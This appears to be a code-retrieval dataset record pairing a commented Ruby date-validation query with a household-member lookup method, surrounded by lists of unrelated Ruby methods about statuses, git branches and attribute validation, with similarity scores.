"def brand_name\n maintenance_record_hub.try(:brand) || car.try(:brand_name)\n end",
"def status\n\t\t\tif `svstat #{@svcdir}` =~ /: (up|down)/\n\t\t\t\tst = $1.to_sym\n\t\t\t\tst = :unmonitored if GOD and st == :down\n\t\t\telse\n\t\t\t\tst = :unknown\n\t\t\tend\n\t\t\tst\n\t\tend",
"def status\n short_state_str=SHORT_VM_STATES[state_str]\n\n if short_state_str==\"actv\"\n short_state_str=SHORT_LCM_STATES[lcm_state_str]\n end\n\n short_state_str\n end",
"def determine_branch_name(repo)\n name = \"\"\n repo.branches.each do |branch|\n if branch.head?\n name = branch.name\n break\n end\n end\n return name\nend",
"def status\n short_state_str=SHORT_VM_STATES[state_str]\n\n if short_state_str=='actv'\n short_state_str=SHORT_LCM_STATES[lcm_state_str]\n end\n\n short_state_str\n end",
"def build_your_team?\n return \"DONE\" if (set_budget? == \"DONE\") && (user.team.has_leadplace_agent?) \n return \"INPROC\" if (set_budget? == \"DONE\") && (!user.team.has_leadplace_agent?)\n return nil\n end",
"def branch\n case @vcs\n when 'github'\n if @data.key? 'ref'\n @data['ref'].sub('refs/heads/', '')\n else\n @data['repository']['default_branch']\n end\n when 'gitlab'\n @data['ref'].sub('refs/heads/', '')\n when 'bitbucket-server'\n @data['changes'][0]['refId'].sub('refs/heads/', '')\n when 'bitbucket'\n return @data['push']['changes'][0]['new']['name'] unless deleted?\n\n @data['push']['changes'][0]['old']['name']\n when 'stash'\n @data['refChanges'][0]['refId'].sub('refs/heads/', '')\n when 'tfs'\n @data['resource']['refUpdates'][0]['name'].sub('refs/heads/', '')\n end\n end",
"def company_brand_code\n self.dig_for_string(\"agentSummary\", \"office\", \"brandCode\")\n end",
"def current_branch\n hg('branch').to_s.strip\n end",
"def status\r\n if @status == \"paid\"\r\n :completed\r\n elsif @tatus == \"refused\"\r\n :refused\r\n else\r\n :pending_payment\r\n end\r\n end",
"def get_brand(brand)\n case brand\n when \"master\"\n return \"mastercard\"\n when \"american_express\"\n return \"amex\"\n else\n return brand\n end\n end",
"def order_status(order_status)\n stat_name = ''\n if order_status == 'deliver'\n stat_name = 'Entregada'\n elsif order_status == 'in_route'\n stat_name = 'Reparto'\n elsif order_status == 'rejected'\n stat_name = 'Rechazada'\n elsif order_status == 'pending'\n stat_name = 'Pendiente'\n elsif order_status.nil?\n stat_name = 'No tiene estado'\n end\n stat_name\n end",
"def active_status\n\tif active\n\t return \"active\"\n\tend\n\treturn \"inactive\"\n end",
"def state_code\n @object.headquarters.try(:state_code)\n end",
"def status\n if closed?\n return \"closed\"\n elsif submitted?\n return retrieved? ? \"retrieved\" : \"submitted\"\n else\n \"new\"\n end\n end",
"def branch_name\n ENV['TRAVIS_BRANCH'] || ENV['CI_BRANCH']\n end",
"def branch_name\n @branch_name ||= ENV['GIT_BRANCH'] || `git rev-parse --abbrev-ref HEAD`.chomp\n end",
"def status_name\n STATUSES[status]\n end",
"def status\n if params['fraud_status'] == 'pass' || params['credit_card_processed'] == 'Y'\n 'Completed'\n elsif params['fraud_status'] == 'wait'\n 'Pending'\n else\n 'Failed'\n end\n end",
"def court_division\n case(court)\n when \"superior\"\n \"Suffolk County Civil\"\n when /^bmc/\n court_name\n else\n \"N/A\"\n end\n end",
"def home_or_away(team_name)\n game_hash[team_name][:status]\nend",
"def current_branch\n git.branch.name\n end",
"def branch\n if request.args.first == \"list\"\n request.args[1]\n else\n request.args.first\n end\n end",
"def status_string\n case status\n when APPROVED_STATUS\n \"approved\"\n when REJECTED_STATUS\n \"rejected\"\n when REMOVED_STATUS\n \"removed\"\n when PENDING_STATUS\n \"pending\"\n else\n \"error\"\n end\n end",
"def billed_or_paid?\n status == PAID || status == BILLED\n end",
"def brand\n cc_type\n end",
"def stage\n case @stage\n when \"hgt-com\"\n :hgt_com\n when \"hgt-par\"\n :hgt_par\n when \"hgt-tot\"\n :hgt_tot \n end\n\n\n end",
"def state_abbrev\n # user_state = self.addresses.first.state.name\n # REGIONS.named(user_state).code\n return self.addresses.first.state.abbrev_name unless self.addresses.first.nil?\n '-'\n end",
"def status\n if @object.deadpooled_on\n 'deadpooled'\n elsif @object.acquired_by.any?\n 'acquired'\n elsif @object.initial_public_offering.present?\n 'IPOed'\n else\n 'alive'\n end\n end",
"def calculated_status\n if deliveries.any? {|delivery| delivery.status == \"not_sent\" }\n \"not_sent\"\n elsif deliveries.any? {|delivery| delivery.status == \"unknown\" }\n \"unknown\"\n elsif deliveries.any? {|delivery| delivery.status == \"hard_bounce\" }\n \"hard_bounce\"\n elsif deliveries.any? {|delivery| delivery.status == \"soft_bounce\" }\n \"soft_bounce\"\n elsif deliveries.all? {|delivery| delivery.status == \"delivered\" }\n \"delivered\"\n else\n raise \"Unexpected situation\"\n end\n end",
"def current_branch\n repo.branches.find(&:head?)\n end",
"def find_branch(repo, branch)\n name, num = branch.split('-')\n\n variations = [ branch, \"#{name}#{num}\", \"#{name}_#{num}\" ]\n\n branches = %x( cd #{repo} ; git branch --list ).gsub('*', '').split(\"\\n\")\n branches.each do |b|\n b.strip!\n variations.each do |v|\n return b if (b == v)\n end\n end\n\n return nil\nend",
"def status_name\n STATUSE.key(@status)\n end",
"def branch\n `git rev-parse --abbrev-ref HEAD`.strip.presence\n rescue\n nil\n end",
"def service\n if origin_url =~ /github/i\n 'github'\n elsif origin_url =~ /bitbucket/i\n 'bitbucket'\n elsif origin_url =~ /stash/i\n 'stash'\n else\n ''\n end\n end",
"def patient_status_str\n case self.status\n when 0\n return 'New visit' \n when 7 \n return 'Cancelled' \n when 3..5 \n return 'Complete' \n else\n return 'In Process'\n end\n end",
"def status_sym\n if self.stars_final.present?\n return :completed\n else\n if self.primary_program_budge?\n if self.day_of_budge.present? and self.day_of_budge < 1\n if self.day_of_budge == 0\n return :ready_to_start # Ready to be moved to day 1\n else\n return :needs_reviving # Start them on a new budge (determine best place)\n end\n elsif self.day_starts_at.present? and self.day_starts_at > Time.now.utc\n return :scheduled\n else\n old_time_zone = Time.zone\n Time.zone = self.program_player.user.time_zone_or_default\n if self.last_completed_date.present? and self.last_completed_date >= Time.zone.today\n Time.zone = old_time_zone\n return :caught_up\n else\n Time.zone = old_time_zone\n if self.days_late <= 3\n return :in_progress\n else\n return :time_up\n end\n end\n end\n else\n return :unknown\n end\n end\n end",
"def update_clinician_status\n binding.pry\n #(region.eql? \"India\") && (speciality.eql? \"dentist\")\n if region == \"India\" && speciality != \"dentist\"\n self.status = \"active\"\n end\n return nil\n end",
"def booking_status\n 'Confirmed'\n end",
"def get_status_name\n\n return Team.status_name(self.status)\n end",
"def status\n statuses = []\n transactions.where(action: 'purchase').each do |t|\n statuses << (t.is_refunded ? 'Refunded' : 'Valid')\n end\n if statuses.uniq.length > 1\n 'Partially Refunded'\n else\n (statuses.uniq == ['Refunded']) ? 'Fully Refunded' : 'Valid'\n end\n end",
"def support(ibel)\n return ibel.payment_mode unless ibel.payment_mode =~ /(bank|cash)_\\d+/\n vals = ibel.payment_mode.split('_')\n case vals[0]\n when 'bank' then BankAccount.find(vals[1]).nickname\n when 'cash' then 'Caisse ' + Cash.find(vals[1]).nickname\n else \n ''\n end\n end",
"def s_status(s_language)\n s_out=breakdancemake_s_bdmservice_status_by_PATH_only_t1(s_language)\n return s_out\n end",
"def milestone_class_for_state(param, check, match_blank_param = false)\n if match_blank_param\n 'active' if param.blank? || param == check\n elsif param == check\n 'active'\n else\n check\n end\n end",
"def branch(group:nil)\n case group\n when :remote\n flag = \"-r\"\n when :all\n flag = \"-a\"\n when nil, :local\n flag = \"\"\n end\n\n `git branch #{flag}`.lines.map do |line|\n fields = line.split\n\n if fields.first['*']\n fields[1].strip\n else\n fields.first.strip\n end\n end\nend",
"def current_status\n status ? 'Active' : 'Inactive'\n end",
"def marital_status; end",
"def repository_label(value)\n identifier =\n if value.is_a?(Symbol)\n value\n elsif (v = value.to_s.downcase).include?('solr')\n :solr\n elsif v.include?('ebsco') || v.include?('eds')\n :eds\n end\n case identifier\n when :solr then 'Solr'\n when :eds then 'EBSCO EDS'\n else \"Unknown (#{value})\"\n end\n end",
"def service_status_mode(mode = :local)\n if mode == :local\n debug \"Choose local status for Pacemaker service '#{name}' on node '#{hostname}'\"\n get_primitive_puppet_status name, hostname\n elsif mode == :global\n debug \"Choose global status for Pacemaker service '#{name}'\"\n get_primitive_puppet_status name\n else\n fail \"Unknown service status mode '#{mode}'\"\n end\n end",
"def humanize_status\n case role_filling_status\n when 'ccm'\n 'CCM'\n when 'non_ccm'\n 'Nicht-CCM'\n when 'substitute'\n 'Vertretung'\n else\n 'Error: enum symbol is invalid'\n end\n end",
"def branch_name\n @branch_name ||= (0...19).map { (65 + rand(26)).chr }.join.downcase\n end",
"def status_label_organization(organization)\n case organization.status\n when 'waiting_approval'\n content_tag(:div, 'pending approval', class: 'label label-warning')\n when 'active'\n content_tag(:div, 'active', class: 'label label-success')\n else\n content_tag(:div, 'archived', class: 'label label-danger')\n end\n end",
"def service_company\n self.well_info.service_company\n end",
"def determine_status\n sent = invoice.email_status == \"EmailSent\"\n balance = invoice.balance.to_f\n\n if balance == 0\n \"Paid\"\n elsif check_due_date(invoice.due_date)\n sent ? \"Overdue Sent\" : \"Overdue\"\n elsif balance > 0 && balance < invoice.total\n sent ? \"Partial Sent\" : \"Partial\"\n elsif balance == invoice.total\n sent ? \"Open Sent\" : \"Open\"\n end\n end",
"def status_label\n absentee? || uocava? ? 'Absentee Status' : 'Voter Status'\n end"
] | [
"0.7212287",
"0.7156464",
"0.6361214",
"0.619933",
"0.60374534",
"0.5984082",
"0.5964916",
"0.59352756",
"0.59222555",
"0.59166205",
"0.5904862",
"0.5904862",
"0.5887707",
"0.5879764",
"0.5865017",
"0.584003",
"0.5736813",
"0.5725427",
"0.56407464",
"0.5610731",
"0.5597073",
"0.55727446",
"0.55322295",
"0.5504616",
"0.54920286",
"0.5483302",
"0.5476279",
"0.5472134",
"0.54619515",
"0.5439903",
"0.5439903",
"0.5436047",
"0.5425356",
"0.54020196",
"0.54015464",
"0.5392687",
"0.53842735",
"0.5374913",
"0.53723246",
"0.53723246",
"0.5363293",
"0.53501326",
"0.5349408",
"0.5338343",
"0.53331107",
"0.533074",
"0.5313166",
"0.5310053",
"0.5308703",
"0.5308582",
"0.5308526",
"0.5302721",
"0.5302356",
"0.5290624",
"0.5284249",
"0.5279743",
"0.52778983",
"0.52773416",
"0.5265983",
"0.52610344",
"0.525738",
"0.52571404",
"0.52567506",
"0.5245043",
"0.52426285",
"0.5241183",
"0.52357674",
"0.5235335",
"0.52345395",
"0.52175176",
"0.52148026",
"0.52056676",
"0.52040136",
"0.51993704",
"0.51919127",
"0.519121",
"0.51901615",
"0.5183428",
"0.5176713",
"0.5172012",
"0.51696026",
"0.5169422",
"0.5169082",
"0.5165484",
"0.51582754",
"0.51446486",
"0.51412255",
"0.51400036",
"0.5131997",
"0.5126146",
"0.51159066",
"0.5114875",
"0.5109219",
"0.51085824",
"0.5097725",
"0.5090696",
"0.5084768",
"0.5079623",
"0.50784343",
"0.5070068"
] | 0.8002263 | 0 |
def all_mandatory_attributes_are_present? result = true if params[:characteristic_type] == 'work' if params[:client_characteristic]['start_date(1i)'].present? && params[:client_characteristic]['start_date(2i)'].present? sd_month = params[:client_characteristic]['start_date(2i)'].to_i sd_day = 1 params[:client_characteristic]['start_date(3i)'].to_i sd_year = params[:client_characteristic]['start_date(1i)'].to_i params[:client_characteristic][:start_date] = Date.civil(sd_year,sd_month,sd_day) else result = false end if params[:client_characteristic]['end_date(1i)'].present? || params[:client_characteristic]['end_date(2i)'].present? if params[:client_characteristic]['end_date(1i)'].present? && params[:client_characteristic]['end_date(2i)'].present? sd_month = params[:client_characteristic]['end_date(2i)'].to_i sd_day = 1 params[:client_characteristic]['end_date(3i)'].to_i sd_year = params[:client_characteristic]['end_date(1i)'].to_i end_date = Date.civil(sd_year,sd_month,sd_day) params[:client_characteristic][:end_date] = end_date.end_of_month else result = false | def set_hoh_data()
li_member_id = params[:household_member_id].to_i
@household_member = HouseholdMember.find(li_member_id)
@household = Household.find(@household_member.household_id)
# @head_of_household_name = HouseholdMember.get_hoh_name(@household.id)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def mandatory_work_characteristic(arg_pgu_adults_collection,arg_week_start_date,arg_week_end_date)\n mandatory_characteristic_present = false\n if arg_pgu_adults_collection\n\t arg_pgu_adults_collection.each do |each_client|\n\t\t mandatory_characteristic = ClientCharacteristic.has_mandatory_work_characteristic_in_a_given_date_range(each_client.id,arg_week_start_date,arg_week_end_date)\n\t\t\tif mandatory_characteristic.present?\n\t\t\t mandatory_characteristic_present = true\n\t\t\t break\n\t\t\tend\n\t end\n else\n #no adults present\n end\n return mandatory_characteristic_present\nend",
"def check_attributes\n if (@values == nil)\n puts \"Specify necessary informations: \"\n get_input_values\n @additions = Array.new()\n end\n #check_time_string\n end",
"def valid_attributes\n { \"amount\"=>1245.to_s, 'book_id'=>@od.to_param,\n \"narration\"=>'Premier virement', \"date\"=>Date.today.to_formatted_s('%d-%m-%Y'),\n :compta_lines_attributes=>{'0'=>{account_id:@ba.to_param}, '1'=>{account_id:@bb.to_param}}\n }\n end",
"def validate_required\n [\n :project_name,\n :status,\n :requester_id,\n :subject_expert_id,\n :sponsor_id,\n :vision,\n :goal,\n :description,\n :scope,\n :advice_required,\n :program_id,\n :train_id,\n :funding_method,\n :cost_center,\n :funding_status,\n :budget_allocated,\n :priority,\n :start_date,\n :end_date,\n :risk_rating,\n :risks,\n :projected_revenue,\n ].each do |field|\n if self.attributes[field.to_s].nil? || self.attributes[field.to_s].blank?\n # intentionally vague!\n add_validation 'All fields are required to perform further validations'\n return false\n end\n end\n true\n end",
"def valid_attributes\n {\n start_date: Date.new(2013, 01, 20),\n end_date: Date.new(2013, 02, 20),\n onsite: false,\n name: \"Early Competitor\",\n registrant_type: \"competitor\",\n expense_item_attributes: {\n cost: @comp_exp.cost,\n tax: @comp_exp.tax\n }\n }\n end",
"def mandatory_case_details?\n claim.court && claim.case_number && claim.supplier_number\n end",
"def valid?\n return false if @summary.nil?\n return false if @summary.to_s.length > 100\n record_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\"])\n return false unless record_type_validator.valid?(@record_type)\n return false if !@wbs_code.nil? && @wbs_code.to_s.length > 50\n return false if @company.nil?\n return false if !@site_name.nil? && @site_name.to_s.length > 50\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state_identifier.nil? && @state_identifier.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@contact_phone_number.nil? && @contact_phone_number.to_s.length > 20\n return false if !@contact_phone_extension.nil? && @contact_phone_extension.to_s.length > 15\n return false if !@contact_email_address.nil? && @contact_email_address.to_s.length > 250\n severity_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless severity_validator.valid?(@severity)\n impact_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless impact_validator.valid?(@impact)\n return false if !@external_x_ref.nil? && @external_x_ref.to_s.length > 100\n return false if !@po_number.nil? && @po_number.to_s.length > 50\n return false if !@automatic_email_cc.nil? && @automatic_email_cc.to_s.length > 1000\n sub_billing_method_validator = EnumAttributeValidator.new('String', [\"ActualRates\", \"FixedFee\", \"NotToExceed\", \"OverrideRate\"])\n return false unless sub_billing_method_validator.valid?(@sub_billing_method)\n knowledge_base_link_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\", \"KnowledgeBaseArticle\", \"Time\", \"Activity\"])\n return false unless knowledge_base_link_type_validator.valid?(@knowledge_base_link_type)\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n predecessor_type_validator = EnumAttributeValidator.new('String', [\"Ticket\", \"Phase\"])\n return false unless predecessor_type_validator.valid?(@predecessor_type)\n return true\n end",
"def dates_valid?\n date_check(params[:start_date]) && date_check(params[:end_date]) && dates_sequential?\n end",
"def valid_attributes\n { \n \"name\" => \"Dummy Sale\",\n \"description\"=>\"Dummy event description data\", \n \"start_date\"=> Time.zone.now.strftime(\"%Y/%m/%d %H:%M:%S %z\"), \n \"end_date\"=> (Time.zone.now+2.months).strftime(\"%Y/%m/%d %H:%M:%S %z\"), \n \"permalink\" => taxon.permalink,\n \"eventable_type\"=> taxon.class.to_s,\n \"eventable_id\" => taxon.id.to_s,\n \"is_active\"=>\"1\", \n \"is_hidden\"=>\"0\", \n \"is_permanent\"=>\"0\"\n }\n end",
"def valid_attributes\n {\n completed: false,\n cancelled: false,\n transaction_id: nil,\n completed_date: Date.new(2012, 1, 30)\n }\n end",
"def date_not_selected(attributes)\n puts attributes\n #puts attributes[\"date(1i)\"].to_i\n #puts attributes[\"date(2i)\"].to_i\n #puts attributes[\"date(3i)\"].to_i\n\n if attributes[\"date(1i)\"].to_i != 0 && attributes[\"date(2i)\"].to_i !=0 &&attributes[\"date(3i)\"].to_i !=0 && attributes[\"date(4i)\"].to_i !=0 && attributes[\"date(5i)\"].to_i !=0\n return false\n else\n return true\n end\n end",
"def mandatory_case_details?\n claim.court && claim.case_number && claim.external_user\n end",
"def process_claim_start_and_end_dates(c,date_qualifier)\n if date_qualifier == \"434\" or date_qualifier == \"472\"\n service_dates = c[1].split(\"-\")\n @claim_information[\"claim_statement_period_start_date\"] = service_dates[0].to_s if @claim_information.claim_statement_period_start_date.nil?\n @claim_information[\"claim_statement_period_end_date\"] = service_dates.length == 2 ? service_dates[1].to_s : service_dates[0].to_s if @claim_information.claim_statement_period_end_date.nil?\n elsif date_qualifier == \"435\" or date_qualifier == \"096\"\n if date_qualifier == \"435\"\n @claim_information[\"claim_statement_period_start_date\"] = c[1] if @claim_information.claim_statement_period_start_date.nil?\n @service_from_date = @claim_information.claim_statement_period_start_date\n else\n @claim_information[\"claim_statement_period_end_date\"] = c[1] if @claim_information.claim_statement_period_end_date.nil?\n @service_to_date = @claim_information.claim_statement_period_end_date\n end\n end\n end",
"def validate_required_attributes\n required = %i[currency_code direction epic force_open guaranteed_stop order_type size\n time_in_force]\n\n required.each do |attribute|\n raise ArgumentError, \"#{attribute} attribute must be set\" if attributes[attribute].nil?\n end\n end",
"def valid?\n return false if !@date_from.nil? && @date_from.to_s.length > 10\n return false if !@date_from.nil? && @date_from.to_s.length < 10\n return false if !@date_to.nil? && @date_to.to_s.length > 10\n return false if !@date_to.nil? && @date_to.to_s.length < 10\n return false if !@request_next_item_key.nil? && @request_next_item_key.to_s.length > 24\n return false if !@request_next_item_key.nil? && @request_next_item_key.to_s.length < 1\n return false if !@request_transfer_class.nil? && @request_transfer_class.to_s.length > 1\n return false if !@request_transfer_class.nil? && @request_transfer_class.to_s.length < 1\n return false if !@request_transfer_term.nil? && @request_transfer_term.to_s.length > 1\n return false if !@request_transfer_term.nil? && @request_transfer_term.to_s.length < 1\n return false if !@next_item_key.nil? && @next_item_key.to_s.length > 24\n return false if !@next_item_key.nil? && @next_item_key.to_s.length < 1\n true\n end",
"def has_fields_for_ride?\n user.present? &&\n from_address.present? &&\n from_city.present? &&\n from_latitude.present? &&\n from_longitude.present? &&\n pickup_at.present?\n end",
"def design_data_filled_in?\n !self.description.blank? && \n !self.platform.blank? && \n !self.product_type.blank? && \n !self.project.blank? &&\n !self.design_directory.blank? &&\n !self.incoming_directory.blank?\n end",
"def validate_essential_attributes #:nodoc:\n if @month.to_i.zero? || @year.to_i.zero?\n errors.add :month, \"is required\" if @month.to_i.zero?\n errors.add :year, \"is required\" if @year.to_i.zero?\n else\n errors.add :month, \"is not a valid month\" unless valid_month?(@month)\n errors.add 'card', \"has expired\" if expired?\n errors.add :year, \"is not a valid year\" unless valid_expiry_year?(@year)\n end\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"asset.DeviceContractInformation\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"asset.DeviceContractInformation\"])\n return false unless object_type_validator.valid?(@object_type)\n contract_status_validator = EnumAttributeValidator.new('String', [\"Unknown\", \"Not Covered\", \"Active\", \"Expiring Soon\"])\n return false unless contract_status_validator.valid?(@contract_status)\n contract_status_reason_validator = EnumAttributeValidator.new('String', [\"\", \"Line Item Expired\", \"Line Item Terminated\"])\n return false unless contract_status_reason_validator.valid?(@contract_status_reason)\n device_type_validator = EnumAttributeValidator.new('String', [\"None\", \"CiscoUcsServer\", \"CiscoUcsFI\", \"CiscoUcsChassis\", \"CiscoNexusSwitch\"])\n return false unless device_type_validator.valid?(@device_type)\n platform_type_validator = EnumAttributeValidator.new('String', [\"\", \"APIC\", \"DCNM\", \"UCSFI\", \"UCSFIISM\", \"IMC\", \"IMCM4\", \"IMCM5\", \"IMCRack\", \"UCSIOM\", \"HX\", \"HyperFlexAP\", \"IWE\", \"UCSD\", \"IntersightAppliance\", \"IntersightAssist\", \"PureStorageFlashArray\", \"UCSC890\", \"NetAppOntap\", \"NetAppActiveIqUnifiedManager\", \"EmcScaleIo\", \"EmcVmax\", \"EmcVplex\", \"EmcXtremIo\", \"VmwareVcenter\", \"MicrosoftHyperV\", \"AppDynamics\", \"Dynatrace\", \"NewRelic\", \"ServiceNow\", \"ReadHatOpenStack\", \"CloudFoundry\", \"MicrosoftAzureApplicationInsights\", \"OpenStack\", \"MicrosoftSqlServer\", \"Kubernetes\", \"AmazonWebService\", \"AmazonWebServiceBilling\", \"MicrosoftAzureServicePrincipal\", \"MicrosoftAzureEnterpriseAgreement\", \"DellCompellent\", \"HPE3Par\", \"RedHatEnterpriseVirtualization\", \"NutanixAcropolis\", \"HPEOneView\", \"ServiceEngine\", \"HitachiVirtualStoragePlatform\", \"IMCBlade\", \"TerraformCloud\", \"TerraformAgent\", \"CustomTarget\", \"AnsibleEndpoint\", \"HTTPEndpoint\", \"SSHEndpoint\", \"CiscoCatalyst\"])\n return false unless platform_type_validator.valid?(@platform_type)\n state_contract_validator = EnumAttributeValidator.new('String', [\"Update\", \"OK\", \"Failed\", \"Retry\"])\n return false unless state_contract_validator.valid?(@state_contract)\n true\n end",
"def validate\n # perform presence related validations here\n # result object is returned\n service_params_list = ServicesBase.get_service_params(self.class.to_s)\n missing_mandatory_params = []\n service_params_list[:mandatory].each do |mandatory_param|\n missing_mandatory_params << \"missing_#{mandatory_param}\" if @params[mandatory_param].to_s.blank?\n end if service_params_list[:mandatory].present?\n\n return error_with_identifier('mandatory_params_missing',\n 'sb_1',\n missing_mandatory_params\n ) if missing_mandatory_params.any?\n\n success\n end",
"def valid?\n return false if @accounts_date.nil?\n return false if @reporting_period.nil?\n return false if @currency.nil?\n return false if @consolidated_accounts.nil?\n return false if @audit_qualification.nil?\n return false if @number_of_employees.nil?\n return false if @turnover.nil?\n return false if @cost_of_sales.nil?\n return false if @sga_plus_other_net_costs.nil?\n return false if @operating_profit.nil?\n return false if @interest_receivable.nil?\n return false if @interest_payable.nil?\n return false if @pre_tax_profit.nil?\n return false if @taxation.nil?\n return false if @post_tax_profit.nil?\n return false if @dividends_payable.nil?\n return false if @retained_profits.nil?\n return false if @intangible_assets.nil?\n return false if @tangible_assets.nil?\n return false if @investments_and_other_assets.nil?\n return false if @fixed_assets.nil?\n return false if @stock.nil?\n return false if @trade_debtors.nil?\n return false if @other_debtors.nil?\n return false if @miscellaneous_current_assets.nil?\n return false if @cash.nil?\n return false if @current_assets.nil?\n return false if @total_assets.nil?\n return false if @bank_loans_and_overdrafts.nil?\n return false if @trade_creditors.nil?\n return false if @miscellaneous_current_liabilities.nil?\n return false if @other_short_term_finances.nil?\n return false if @current_liabilities.nil?\n return false if @contingent_liabilities.nil?\n return false if @other_long_term_finances.nil?\n return false if @total_long_term_liabilities.nil?\n return false if @total_liabilities.nil?\n return false if @net_assets.nil?\n return false if @equity_paid_up.nil?\n return false if @revaluation_reserve.nil?\n return false if @sundry_reserves.nil?\n return false if @profit_and_loss_account_reserve.nil?\n return false if @shareholder_funds.nil?\n return false if @depreciation.nil?\n return false if @amortisation_of_intangibles.nil?\n return false if @ebitda.nil?\n return false if @working_capital.nil?\n return false if @capital_employed.nil?\n return false if @wages_and_salaries.nil?\n return false if @directors_emoluments.nil?\n return false if @audit_fees.nil?\n return false if @bank_overdraft_and_long_term_loans.nil?\n return false if @net_cash_flow_from_operations.nil?\n return false if @net_cash_flow_before_financing.nil?\n return false if @net_cash_flow_from_financing.nil?\n return false if @increase_in_cash.nil?\n return false if @debtor_days.nil?\n return false if @exports.nil?\n return false if @gross_margin_percentage.nil?\n return false if @operating_profit_margin_percentage.nil?\n return false if @ebitda_margin_percentage.nil?\n return false if @pre_tax_profit_margin_percentage.nil?\n return false if @net_margin_percentage.nil?\n return false if @return_on_assets_percentage.nil?\n return false if @return_on_capital_employed_percentage.nil?\n return false if @return_on_equity.nil?\n return false if @current_ratio.nil?\n return false if @cash_to_current_liabilities_ratio.nil?\n return false if @cash_to_total_assets_percentage.nil?\n return false if @liquidity_ratio.nil?\n return false if @gearing_percentage_on_liability_basis.nil?\n return false if @gearing_percentage_on_gross_debt_basis.nil?\n return false if @gearing_percentage_on_net_debt_basis.nil?\n return false if @debt_to_capital_percentage.nil?\n return false if @inventory_turnover_ratio.nil?\n return false if @cash_to_turnover_percentage.nil?\n return false if @days_inventory_outstanding.nil?\n return false if @days_sales_outstanding.nil?\n return false if @days_payable_outstanding.nil?\n return false if @cash_conversion_cycle.nil?\n return false if @revenue_per_employee.nil?\n return false if @human_capital_value_added.nil?\n return false if @interest_coverage_ratio.nil?\n return false if @net_debt_to_ebitda_ratio.nil?\n return false if @cfo_to_sales_ratio.nil?\n return false if @auditor.nil?\n return false if @joint_auditor.nil?\n return false if @solicitor.nil?\n return false if @accountant.nil?\n return true\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 25\n return false if @based_on.nil?\n based_on_validator = EnumAttributeValidator.new('String', [\"MyCalendar\", \"Customer\", \"AllHours\", \"Custom\"])\n return false unless based_on_validator.valid?(@based_on)\n return false if !@application_order.nil? && @application_order > 32767\n return false if !@application_order.nil? && @application_order < 1\n return false if !@respond_hours.nil? && @respond_hours > 999\n return false if !@respond_hours.nil? && @respond_hours < 0\n return false if !@respond_percent.nil? && @respond_percent > 99999\n return false if !@respond_percent.nil? && @respond_percent < 0\n return false if !@plan_within.nil? && @plan_within > 999\n return false if !@plan_within.nil? && @plan_within < 0\n return false if !@plan_within_percent.nil? && @plan_within_percent > 99999\n return false if !@plan_within_percent.nil? && @plan_within_percent < 0\n return false if !@resolution_hours.nil? && @resolution_hours > 999\n return false if !@resolution_hours.nil? && @resolution_hours < 0\n return false if !@resolution_percent.nil? && @resolution_percent > 99999\n return false if !@resolution_percent.nil? && @resolution_percent < 0\n return true\n end",
"def valid?\n type_validator = EnumAttributeValidator.new('String', [\"person\", \"business\"])\n return false unless type_validator.valid?(@type)\n return false if @country.nil?\n return false if @street.nil?\n return false if @postal_code.nil?\n return false if @city.nil?\n return false if @email.nil?\n return false if @ip.nil?\n identification_type_validator = EnumAttributeValidator.new('String', [\"DL\", \"PP\", \"ID\", \"OT\"])\n return false unless identification_type_validator.valid?(@identification_type)\n legal_entity_type_validator = EnumAttributeValidator.new('String', [\"sole_proprietorship\", \"partnership\", \"privately_owned_company\", \"publicly_owned_company\", \"government_owned_entity\", \"trust\", \"ngo\", \"club_and_society\", \"go\", \"other\", \"financial_institution\", \"mto\"])\n return false unless legal_entity_type_validator.valid?(@legal_entity_type)\n nature_of_business_validator = EnumAttributeValidator.new('String', [\"personal\", \"agriculture_and_hunting\", \"forestry\", \"fishing\", \"agricultural_by_products\", \"coal_mining\", \"oil_mining\", \"iron_ore_mining\", \"other_metal_and_diamond_mining\", \"other_mineral_mining\", \"manufacturing_of_food_drink_tobacco\", \"manufacturing_of_textiles_leather_fur_furniture\", \"manufacture_of_wooden_products_furniture\", \"manufacture_of_paper_pulp_allied_products\", \"manufacture_of_chemicals_medical_petroleum_rubber_plastic_products\", \"manufacture_of_pottery_china_glass_stone\", \"manufacture_of_iron_steel_non_ferrous_metals_basic_industries\", \"manufacture_of_metal_products_electrical_and_scientific_engineering\", \"manufacture_of_jewelry_musical_instruments_toys\", \"electricity_gas_and_water\", \"construction\", \"wholesale_trade\", \"retail_trade\", \"catering_incl_hotels\", \"transport_storage\", \"communications\", \"finance_and_holding_companies\", \"insurance\", \"business_services\", \"real_estate_development_investment\", \"central_state_governments\", \"community_services_defence_police_prisons_etc\", \"social_services_education_health_care\", \"personal_services_leisure_services\", \"personal_services_domestic_laundry_repairs\", \"personal_services_embassies_international_organisations\"])\n return false unless nature_of_business_validator.valid?(@nature_of_business)\n return false if @documents.nil?\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\", \"O\"])\n return false unless gender_validator.valid?(@gender)\n true\n end",
